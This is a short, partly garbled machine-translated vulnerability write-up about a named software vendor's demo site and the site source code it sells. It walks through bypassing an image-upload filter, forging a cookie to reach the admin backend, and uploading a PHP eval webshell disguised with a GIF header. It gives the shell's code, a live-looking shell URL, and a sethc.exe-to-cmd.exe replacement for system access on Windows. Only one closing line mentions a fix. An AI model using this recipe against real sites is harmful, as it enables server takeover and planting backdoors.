Official Website:Http://www.taodisoft.com
1. There is actually a place in the background of the demo station that can upload images without prohibiting upload.
2. Simple filtering of uploaded images, making it easy to break through. Upload and execute PHP files.
3rd, the server (vps)configuration is strictly down. When webshellis obtained, the system permission is directly applied. For Windows systems, replace sethc.exe and directly connect to the Remote Desktop.
4. The source code it sells also has this upload vulnerability.
5. The source code it sells also has the cookie Forgery Vulnerability that directly enters the background. Therefore, if the source code website's background path is not changed, you can directly modify the cookie to enter the background, insert a Trojan, or directly upload executable files to obtain webshell.
The upload address is: backend-homepage configuration-classification product-upload the image below
Directly construct the shell. php file code
GIF89A
<? Php @ eval ($ _ POST [pass]);?>
Upload to get shell, address: http://www.bkjia.com/img/index/shell.php
After obtaining webshell, it is the system permission .......
Replace sethc.exewith cmd.exe.
BY: Lu renjia, edited BY emotion
Www.2cto.com provides a repair policy: the program is not a new problem, and the filtering is enhanced. Server Security is a complicated issue. Please refer to this article.